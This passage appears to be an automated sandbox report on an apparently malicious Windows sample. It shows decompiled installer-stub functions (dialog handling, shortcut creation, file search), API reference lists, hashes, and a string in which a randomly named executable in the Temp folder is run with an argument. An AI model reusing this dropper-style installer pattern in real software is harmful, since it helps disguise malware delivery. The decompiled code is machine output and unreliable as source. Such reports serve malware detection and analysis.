                                                    • Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                    • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                                                    • Part of subcall function 00404E71: SetDlgItemTextW.USER32 ref: 00404F2E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: "C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i$A$C:\Users\user~1\AppData\Local\Temp$H7B
                                                  • API String ID: 2624150263-2998403876
                                                  • Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                  • Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
                                                  • Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                  • Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 67%
                                                  			E004021AA() {
                                                  				signed int _t52;
                                                  				void* _t56;
                                                  				intOrPtr* _t60;
                                                  				intOrPtr _t61;
                                                  				intOrPtr* _t62;
                                                  				intOrPtr* _t64;
                                                  				intOrPtr* _t66;
                                                  				intOrPtr* _t68;
                                                  				intOrPtr* _t70;
                                                  				intOrPtr* _t72;
                                                  				intOrPtr* _t74;
                                                  				intOrPtr* _t76;
                                                  				intOrPtr* _t78;
                                                  				intOrPtr* _t80;
                                                  				void* _t83;
                                                  				intOrPtr* _t91;
                                                  				signed int _t101;
                                                  				signed int _t105;
                                                  				void* _t107;
                                                  
                                                  				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                                                  				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                                                  				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                                                  				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                                                  				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                                                  				_t52 =  *(_t107 - 0x20);
                                                  				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                                                  				_t101 = _t52 & 0x00008000;
                                                  				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                                  				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                                                  				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                                                  					E00402DA6(0x21);
                                                  				}
                                                  				_t56 = _t107 + 8;
                                                  				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
                                                  				if(_t56 < _t83) {
                                                  					L14:
                                                  					 *((intOrPtr*)(_t107 - 4)) = 1;
                                                  					_push(0xfffffff0);
                                                  				} else {
                                                  					_t60 =  *((intOrPtr*)(_t107 + 8));
                                                  					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
                                                  					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                                                  					if(_t61 >= _t83) {
                                                  						_t64 =  *((intOrPtr*)(_t107 + 8));
                                                  						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                                                  						if(_t101 == _t83) {
                                                  							_t80 =  *((intOrPtr*)(_t107 + 8));
                                                  							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp");
                                                  						}
                                                  						if(_t105 != _t83) {
                                                  							_t78 =  *((intOrPtr*)(_t107 + 8));
                                                  							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                                  						}
                                                  						_t66 =  *((intOrPtr*)(_t107 + 8));
                                                  						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                                                  						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                                                  						if( *_t91 != _t83) {
                                                  							_t76 =  *((intOrPtr*)(_t107 + 8));
                                                  							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                                                  						}
                                                  						_t68 =  *((intOrPtr*)(_t107 + 8));
                                                  						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                                  						_t70 =  *((intOrPtr*)(_t107 + 8));
                                                  						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                                  						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                  							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                                                  							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                                                  						}
                                                  						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                                                  						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                  					}
                                                  					_t62 =  *((intOrPtr*)(_t107 + 8));
                                                  					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                  					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                  						_push(0xfffffff4);
                                                  					} else {
                                                  						goto L14;
                                                  					}
                                                  				}
                                                  				E00401423();
                                                  				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
                                                  				return 0;
                                                  			}

                                                  APIs
                                                  • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                  Strings
                                                  • C:\Users\user~1\AppData\Local\Temp, xrefs: 00402269
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: CreateInstance
                                                  • String ID: C:\Users\user~1\AppData\Local\Temp
                                                  • API String ID: 542301482-3107243751
                                                  • Opcode ID: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                                  • Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
                                                  • Opcode Fuzzy Hash: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                                  • Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 39%
                                                  			E0040290B(short __ebx, short* __edi) {
                                                  				void* _t21;
                                                  
                                                  				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
                                                  					E004065AF( *((intOrPtr*)(_t21 - 0xc)), _t8);
                                                  					_push(_t21 - 0x2b0);
                                                  					_push(__edi);
                                                  					E00406668();
                                                  				} else {
                                                  					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                                                  					 *__edi = __ebx;
                                                  					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                  				}
                                                  				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
                                                  				return 0;
                                                  			}

                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID:
                                                  • API String ID: 1974802433-0
                                                  • Opcode ID: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                                  • Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
                                                  • Opcode Fuzzy Hash: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                                  • Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 96%
                                                  			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                  				struct HWND__* _v8;
                                                  				struct HWND__* _v12;
                                                  				long _v16;
                                                  				signed int _v20;
                                                  				signed int _v24;
                                                  				intOrPtr _v28;
                                                  				signed char* _v32;
                                                  				int _v36;
                                                  				signed int _v44;
                                                  				int _v48;
                                                  				signed int* _v60;
                                                  				signed char* _v64;
                                                  				signed int _v68;
                                                  				long _v72;
                                                  				void* _v76;
                                                  				intOrPtr _v80;
                                                  				intOrPtr _v84;
                                                  				void* _v88;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				signed int _t198;
                                                  				intOrPtr _t201;
                                                  				long _t207;
                                                  				signed int _t211;
                                                  				signed int _t222;
                                                  				void* _t225;
                                                  				void* _t226;
                                                  				int _t232;
                                                  				long _t237;
                                                  				long _t238;
                                                  				signed int _t239;
                                                  				signed int _t245;
                                                  				signed int _t247;
                                                  				signed char _t248;
                                                  				signed char _t254;
                                                  				void* _t258;
                                                  				void* _t260;
                                                  				signed char* _t278;
                                                  				signed char _t279;
                                                  				long _t284;
                                                  				struct HWND__* _t291;
                                                  				signed int* _t292;
                                                  				int _t293;
                                                  				long _t294;
                                                  				signed int _t295;
                                                  				void* _t297;
                                                  				long _t298;
                                                  				int _t299;
                                                  				signed int _t300;
                                                  				signed int _t303;
                                                  				signed int _t311;
                                                  				signed char* _t319;
                                                  				int _t324;
                                                  				void* _t326;
                                                  
                                                  				_t291 = _a4;
                                                  				_v12 = GetDlgItem(_t291, 0x3f9);
                                                  				_v8 = GetDlgItem(_t291, 0x408);
                                                  				_t326 = SendMessageW;
                                                  				_v24 =  *0x42a288;
                                                  				_v28 =  *0x42a270 + 0x94;
                                                  				if(_a8 != 0x110) {
                                                  					L23:
                                                  					if(_a8 != 0x405) {
                                                  						_t301 = _a16;
                                                  					} else {
                                                  						_a12 = 0;
                                                  						_t301 = 1;
                                                  						_a8 = 0x40f;
                                                  						_a16 = 1;
                                                  					}
                                                  					if(_a8 == 0x4e || _a8 == 0x413) {
                                                  						_v16 = _t301;
                                                  						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                                                  							if(( *0x42a279 & 0x00000002) != 0) {
                                                  								L41:
                                                  								if(_v16 != 0) {
                                                  									_t237 = _v16;
                                                  									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                                                  										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                                                  									}
                                                  									_t238 = _v16;
                                                  									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                                                  										_t301 = _v24;
                                                  										_t239 =  *(_t238 + 0x5c);
                                                  										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                                                  											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                                                  										} else {
                                                  											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                                                  										}
                                                  									}
                                                  								}
                                                  								goto L48;
                                                  							}
                                                  							if(_a8 == 0x413) {
                                                  								L33:
                                                  								_t301 = 0 | _a8 != 0x00000413;
                                                  								_t245 = E00404F7F(_v8, _a8 != 0x413);
                                                  								_t295 = _t245;
                                                  								if(_t295 >= 0) {
                                                  									_t94 = _v24 + 8; // 0x8
                                                  									_t301 = _t245 * 0x818 + _t94;
                                                  									_t247 =  *_t301;
                                                  									if((_t247 & 0x00000010) == 0) {
                                                  										if((_t247 & 0x00000040) == 0) {
                                                  											_t248 = _t247 ^ 0x00000001;
                                                  										} else {
                                                  											_t254 = _t247 ^ 0x00000080;
                                                  											if(_t254 >= 0) {
                                                  												_t248 = _t254 & 0x000000fe;
                                                  											} else {
                                                  												_t248 = _t254 | 0x00000001;
                                                  											}
                                                  										}
                                                  										 *_t301 = _t248;
                                                  										E0040117D(_t295);
                                                  										_a12 = _t295 + 1;
                                                  										_a16 =  !( *0x42a278) >> 0x00000008 & 0x00000001;
                                                  										_a8 = 0x40f;
                                                  									}
                                                  								}
                                                  								goto L41;
                                                  							}
                                                  							_t301 = _a16;
                                                  							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                  								goto L41;
                                                  							}
                                                  							goto L33;
                                                  						} else {
                                                  							goto L48;
                                                  						}
                                                  					} else {
                                                  						L48:
                                                  						if(_a8 != 0x111) {
                                                  							L56:
                                                  							if(_a8 == 0x200) {
                                                  								SendMessageW(_v8, 0x200, 0, 0);
                                                  							}
                                                  							if(_a8 == 0x40b) {
                                                  								_t225 =  *0x42372c;
                                                  								if(_t225 != 0) {
                                                  									ImageList_Destroy(_t225);
                                                  								}
                                                  								_t226 =  *0x423740;
                                                  								if(_t226 != 0) {
                                                  									GlobalFree(_t226);
                                                  								}
                                                  								 *0x42372c = 0;
                                                  								 *0x423740 = 0;
                                                  								 *0x42a2c0 = 0;
                                                  							}
                                                  							if(_a8 != 0x40f) {
                                                  								L90:
                                                  								if(_a8 == 0x420 && ( *0x42a279 & 0x00000001) != 0) {
                                                  									_t324 = (0 | _a16 == 0x00000020) << 3;
                                                  									ShowWindow(_v8, _t324);
                                                  									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                                                  								}
                                                  								goto L93;
                                                  							} else {
                                                  								E004011EF(_t301, 0, 0);
                                                  								_t198 = _a12;
                                                  								if(_t198 != 0) {
                                                  									if(_t198 != 0xffffffff) {
                                                  										_t198 = _t198 - 1;
                                                  									}
                                                  									_push(_t198);
                                                  									_push(8);
                                                  									E00404FFF();
                                                  								}
                                                  								if(_a16 == 0) {
                                                  									L75:
                                                  									E004011EF(_t301, 0, 0);
                                                  									_v36 =  *0x423740;
                                                  									_t201 =  *0x42a288;
                                                  									_v64 = 0xf030;
                                                  									_v24 = 0;
                                                  									if( *0x42a28c <= 0) {
                                                  										L86:
                                                  										if( *0x42a31e == 0x400) {
                                                  											InvalidateRect(_v8, 0, 1);
                                                  										}
                                                  										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
                                                  											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
                                                  										}
                                                  										goto L90;
                                                  									}
                                                  									_t292 = _t201 + 8;
                                                  									do {
                                                  										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                  										if(_t207 != 0) {
                                                  											_t303 =  *_t292;
                                                  											_v72 = _t207;
                                                  											_v76 = 8;
                                                  											if((_t303 & 0x00000001) != 0) {
                                                  												_v76 = 9;
                                                  												_v60 =  &(_t292[4]);
                                                  												_t292[0] = _t292[0] & 0x000000fe;
                                                  											}
                                                  											if((_t303 & 0x00000040) == 0) {
                                                  												_t211 = (_t303 & 0x00000001) + 1;
                                                  												if((_t303 & 0x00000010) != 0) {
                                                  													_t211 = _t211 + 3;
                                                  												}
                                                  											} else {
                                                  												_t211 = 3;
                                                  											}
                                                  											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                                                  											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                  											SendMessageW(_v8, 0x113f, 0,  &_v76);
                                                  										}
                                                  										_v24 = _v24 + 1;
                                                  										_t292 =  &(_t292[0x206]);
                                                  									} while (_v24 <  *0x42a28c);
                                                  									goto L86;
                                                  								} else {
                                                  									_t293 = E004012E2( *0x423740);
                                                  									E00401299(_t293);
                                                  									_t222 = 0;
                                                  									_t301 = 0;
                                                  									if(_t293 <= 0) {
                                                  										L74:
                                                  										SendMessageW(_v12, 0x14e, _t301, 0);
                                                  										_a16 = _t293;
                                                  										_a8 = 0x420;
                                                  										goto L75;
                                                  									} else {
                                                  										goto L71;
                                                  									}
                                                  									do {
                                                  										L71:
                                                  										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                                                  											_t301 = _t301 + 1;
                                                  										}
                                                  										_t222 = _t222 + 1;
                                                  									} while (_t222 < _t293);
                                                  									goto L74;
                                                  								}
                                                  							}
                                                  						}
                                                  						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                  							goto L93;
                                                  						} else {
                                                  							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                                                  							if(_t232 == 0xffffffff) {
                                                  								goto L93;
                                                  							}
                                                  							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                                                  							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                                                  								_t294 = 0x20;
                                                  							}
                                                  							E00401299(_t294);
                                                  							SendMessageW(_a4, 0x420, 0, _t294);
                                                  							_a12 = _a12 | 0xffffffff;
                                                  							_a16 = 0;
                                                  							_a8 = 0x40f;
                                                  							goto L56;
                                                  						}
                                                  					}
                                                  				} else {
                                                  					_v36 = 0;
                                                  					_v20 = 2;
                                                  					 *0x42a2c0 = _t291;
                                                  					 *0x423740 = GlobalAlloc(0x40,  *0x42a28c << 2);
                                                  					_t258 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
                                                  					 *0x423734 =  *0x423734 | 0xffffffff;
                                                  					_t297 = _t258;
                                                  					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E0040563E);
                                                  					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                  					 *0x42372c = _t260;
                                                  					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                                                  					SendMessageW(_v8, 0x1109, 2,  *0x42372c);
                                                  					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                                  						SendMessageW(_v8, 0x111b, 0x10, 0);
                                                  					}
                                                  					DeleteObject(_t297);
                                                  					_t298 = 0;
                                                  					do {
                                                  						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                                                  						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                                                  							if(_t298 != 0x20) {
                                                  								_v20 = 0;
                                                  							}
                                                  							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
                                                  						}
                                                  						_t298 = _t298 + 1;
                                                  					} while (_t298 < 0x21);
                                                  					_t299 = _a16;
                                                  					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                                                  					_push(0x15);
                                                  					E004045C4(_a4);
                                                  					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                                                  					_push(0x16);
                                                  					E004045C4(_a4);
                                                  					_t300 = 0;
                                                  					_v16 = 0;
                                                  					if( *0x42a28c <= 0) {
                                                  						L19:
                                                  						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                                  						goto L20;
                                                  					} else {
                                                  						_t319 = _v24 + 8;
                                                  						_v32 = _t319;
                                                  						do {
                                                  							_t278 =  &(_t319[0x10]);
                                                  							if( *_t278 != 0) {
                                                  								_v64 = _t278;
                                                  								_t279 =  *_t319;
                                                  								_v88 = _v16;
                                                  								_t311 = 0x20;
                                                  								_v84 = 0xffff0002;
                                                  								_v80 = 0xd;
                                                  								_v68 = _t311;
                                                  								_v44 = _t300;
                                                  								_v72 = _t279 & _t311;
                                                  								if((_t279 & 0x00000002) == 0) {
                                                  									if((_t279 & 0x00000004) == 0) {
                                                  										 *( *0x423740 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                  									} else {
                                                  										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                                                  									}
                                                  								} else {
                                                  									_v80 = 0x4d;
                                                  									_v48 = 1;
                                                  									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                  									_v36 = 1;
                                                  									 *( *0x423740 + _t300 * 4) = _t284;
                                                  									_v16 =  *( *0x423740 + _t300 * 4);
                                                  								}
                                                  							}
                                                  							_t300 = _t300 + 1;
                                                  							_t319 =  &(_v32[0x818]);
                                                  							_v32 = _t319;
                                                  						} while (_t300 <  *0x42a28c);
                                                  						if(_v36 != 0) {
                                                  							L20:
                                                  							if(_v20 != 0) {
                                                  								E004045F9(_v8);
                                                  								goto L23;
                                                  							} else {
                                                  								ShowWindow(_v12, 5);
                                                  								E004045F9(_v12);
                                                  								L93:
                                                  								return E0040462B(_a8, _a12, _a16);
                                                  							}
                                                  						}
                                                  						goto L19;
                                                  					}
                                                  				}
                                                  			}

                                                  0x0040559c
                                                  0x0040559e
                                                  0x004055a1
                                                  0x004055aa
                                                  0x00000000
                                                  0x004054b1
                                                  0x004054bc
                                                  0x004054bf
                                                  0x004054c4
                                                  0x004054c6
                                                  0x004054ca
                                                  0x004054da
                                                  0x004054e4
                                                  0x004054e6
                                                  0x004054e9
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004054cc
                                                  0x004054cc
                                                  0x004054d2
                                                  0x004054d4
                                                  0x004054d4
                                                  0x004054d5
                                                  0x004054d6
                                                  0x00000000
                                                  0x004054cc
                                                  0x004054af
                                                  0x0040548a
                                                  0x004053cd
                                                  0x00000000
                                                  0x004053e3
                                                  0x004053ed
                                                  0x004053f2
                                                  0x00000000
                                                  0x00000000
                                                  0x00405404
                                                  0x00405409
                                                  0x00405415
                                                  0x00405415
                                                  0x00405417
                                                  0x00405426
                                                  0x00405428
                                                  0x0040542c
                                                  0x0040542f
                                                  0x00000000
                                                  0x0040542f
                                                  0x004053cd
                                                  0x00405083
                                                  0x00405088
                                                  0x00405091
                                                  0x00405098
                                                  0x004050aa
                                                  0x004050b5
                                                  0x004050bb
                                                  0x004050c9
                                                  0x004050dd
                                                  0x004050e2
                                                  0x004050ef
                                                  0x004050f4
                                                  0x0040510a
                                                  0x0040511b
                                                  0x00405128
                                                  0x00405128
                                                  0x0040512b
                                                  0x00405131
                                                  0x00405133
                                                  0x00405136
                                                  0x0040513b
                                                  0x00405140
                                                  0x00405142
                                                  0x00405142
                                                  0x00405162
                                                  0x00405162
                                                  0x00405164
                                                  0x00405165
                                                  0x0040516a
                                                  0x00405170
                                                  0x00405174
                                                  0x00405179
                                                  0x00405181
                                                  0x00405185
                                                  0x0040518a
                                                  0x0040518f
                                                  0x00405197
                                                  0x0040519a
                                                  0x0040526a
                                                  0x0040527d
                                                  0x00000000
                                                  0x004051a0
                                                  0x004051a3
                                                  0x004051a6
                                                  0x004051a9
                                                  0x004051a9
                                                  0x004051af
                                                  0x004051b8
                                                  0x004051bb
                                                  0x004051bf
                                                  0x004051c2
                                                  0x004051c5
                                                  0x004051ce
                                                  0x004051d7
                                                  0x004051da
                                                  0x004051dd
                                                  0x004051e0
                                                  0x0040521e
                                                  0x00405249
                                                  0x00405220
                                                  0x0040522f
                                                  0x0040522f
                                                  0x004051e2
                                                  0x004051e5
                                                  0x004051f3
                                                  0x004051fd
                                                  0x00405205
                                                  0x0040520c
                                                  0x00405217
                                                  0x00405217
                                                  0x004051e0
                                                  0x0040524f
                                                  0x00405250
                                                  0x0040525c
                                                  0x0040525c
                                                  0x00405268
                                                  0x00405283
                                                  0x00405286
                                                  0x004052a3
                                                  0x00000000
                                                  0x00405288
                                                  0x0040528d
                                                  0x00405296
                                                  0x00405629
                                                  0x0040563b
                                                  0x0040563b
                                                  0x00405286
                                                  0x00000000
                                                  0x00405268
                                                  0x0040519a

                                                  APIs
                                                  • GetDlgItem.USER32 ref: 00405049
                                                  • GetDlgItem.USER32 ref: 00405054
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
                                                  • LoadImageW.USER32 ref: 004050B5
                                                  • SetWindowLongW.USER32 ref: 004050CE
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
                                                  • DeleteObject.GDI32(00000000), ref: 0040512B
                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                                                  • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                                                    • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                                                  • SetWindowLongW.USER32 ref: 0040527D
                                                  • ShowWindow.USER32(?,00000005), ref: 0040528D
                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                                                  • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                                                  • GlobalFree.KERNEL32 ref: 0040546B
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
                                                  • ShowWindow.USER32(?,00000000), ref: 00405615
                                                  • GetDlgItem.USER32 ref: 00405620
                                                  • ShowWindow.USER32(00000000), ref: 00405627
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $M$N
                                                  • API String ID: 2564846305-813528018
                                                  • Opcode ID: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                  • Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
                                                  • Opcode Fuzzy Hash: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                  • Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 91%
                                                  			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                                  				intOrPtr _v8;
                                                  				int _v12;
                                                  				void* _v16;
                                                  				struct HWND__* _t56;
                                                  				signed int _t75;
                                                  				signed short* _t76;
                                                  				signed short* _t78;
                                                  				long _t92;
                                                  				int _t103;
                                                  				signed int _t110;
                                                  				intOrPtr _t113;
                                                  				WCHAR* _t114;
                                                  				signed int* _t116;
